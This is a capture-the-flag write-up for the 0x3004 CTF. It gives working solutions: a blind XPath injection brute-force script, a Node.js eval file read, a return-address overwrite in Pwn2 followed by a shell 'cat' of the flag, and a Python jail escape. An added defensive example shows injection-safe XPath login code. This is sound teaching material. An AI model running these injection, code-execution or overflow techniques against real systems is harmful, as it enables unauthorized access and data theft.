0x3004 CTF - Pwn2, EZ, Calc, PATH_TO_PRO, "DOTO, BEST DOTO", Pyjail 1 Writeup
EZ:
http://challenges.wargame.vn:50000/-h/index
output: -f FILE, --file=FILE READ FILE
http://challenges.wargame.vn:50000/-f=flag/index
0x3004{EzZzZzZzZzZzZ}
Calc:
We have a nice Node.js code exec here:
eval=
fs = require('fs');
fs.readFileSync("flag_is_here_you_wont_able_to_guess_this_file_name");
flag: 0x3004{n0jsn0fun}
PATH_TO_PRO:
XPath injection here. Sadly, I found out afterwards that there was a much shorter and easier way to get the flag than mine:
import requests
# Node paths and flag recovered with this script:
#/all/user/u/pass
#/all/user/u/name
#/all/user/u/data
#/all/f_ll_ag/data
#0x3004{XXXpath}
pwd = ""
for j in range(1, 16):        # character position in the target string
    for i in range(48, 127):  # candidate characters '0'..'~'
        if chr(i) == '&':     # '&' would end the name parameter
            continue
        #query='http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/index.php?name=admin" or substring(name(/all/f_ll_ag/*[1]),'+str(j)+',1)="'+chr(i)+'&pass=guest'
        query='http://challenges.wargame.vn/100-path-to-pro_548f20feaa3736e0c7320fc5e5b14a8c/index.php?name=admin" or substring(/all/f_ll_ag/data/text(),'+str(j)+',1)="'+chr(i)+'&pass=guest'
        r = requests.get(query)
        # a response containing 'Maybe' is treated as "condition true"
        if 'Maybe' in r.text:
            print("OK " + chr(i))
            pwd += chr(i)
            break
        else:
            print("Nope " + chr(i))
print(pwd)
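The defensive counterpart to the script above, as an added example that is not part of the original writeup or the challenge's code: the login check compares user input as data instead of concatenating it into an XPath string, so the substring() probe is just a wrong name. The XML values, `login` and `xpath_literal` are assumptions made for illustration; only the element names come from the paths listed above.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed sample document: element names follow the paths listed in the
# writeup's comments; all values are made up for this example.
SAMPLE_XML = """<all>
  <user>
    <u><name>admin</name><pass>s3cret-admin</pass><data>admin notes</data></u>
    <u><name>guest</name><pass>guest</pass><data>guest notes</data></u>
  </user>
  <f_ll_ag><data>PLACEHOLDER_FLAG</data></f_ll_ag>
</all>"""
ROOT = ET.fromstring(SAMPLE_XML)


def xpath_literal(value):
    """Quote value as an XPath 1.0 string literal, for engines where the query
    must be built as text. XPath 1.0 has no escape character, so a value with
    both quote types is split on '"' and rejoined with concat()."""
    if '"' not in value:
        return '"' + value + '"'
    if "'" not in value:
        return "'" + value + "'"
    parts = value.split('"')
    return "concat(" + ", '\"', ".join('"' + p + '"' for p in parts) + ")"


def _same(a, b):
    # Constant-time comparison on bytes, so non-ASCII input is handled too.
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def login(name, password):
    """Return the user's data on a match, else None. User input is only ever
    compared as data; it is never spliced into an XPath expression."""
    for u in ROOT.iterfind("user/u"):  # fixed path, no user input in it
        if _same(u.findtext("name", ""), name) and _same(u.findtext("pass", ""), password):
            return u.findtext("data")
    return None


if __name__ == "__main__":
    probe = 'admin" or substring(/all/f_ll_ag/data/text(),1,1)="P'
    print(login("guest", "guest"))  # valid credentials match
    print(login(probe, "guest"))    # the probe is treated as a literal name
    print(xpath_literal(probe))     # the same probe quoted as one string
```
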
DOTO, BEST DOTO:
easy programming challenge: http://pastebin.com/gvzb8Qxh
Pwn2:
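# s is an already-connected socket to the challenge service (setup not shown in the original)
data = s.recv(1024)
data = s.recv(1024)
payload = b"\n"
s.send(payload)
# 8 filler bytes followed by the little-endian address 0x004006b2
payload = b"A"*8 + b"\xb2\x06\x40\x00"
s.send(payload + b"\n")
data = s.recv(1024)
# send a shell command to read the flag
s.send(b"cat /home/pwn2/flag\n")
data = s.recv(1024)
print(data.decode(errors="replace"))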
#0x3004{Dat_nuoc_Viet_Nam_La_Mot_Dan_Toc_Viet_Nam_La_Mot}
Pyjail 1:
This challenge was solved by nurfed. Basically, the script cleared modules and deleted dir(), eval, etc., but we can still access local variables through vars():
list(vars()[list(vars())[8]])
flag: 0x3004{ez_Bre34k}
Razor4x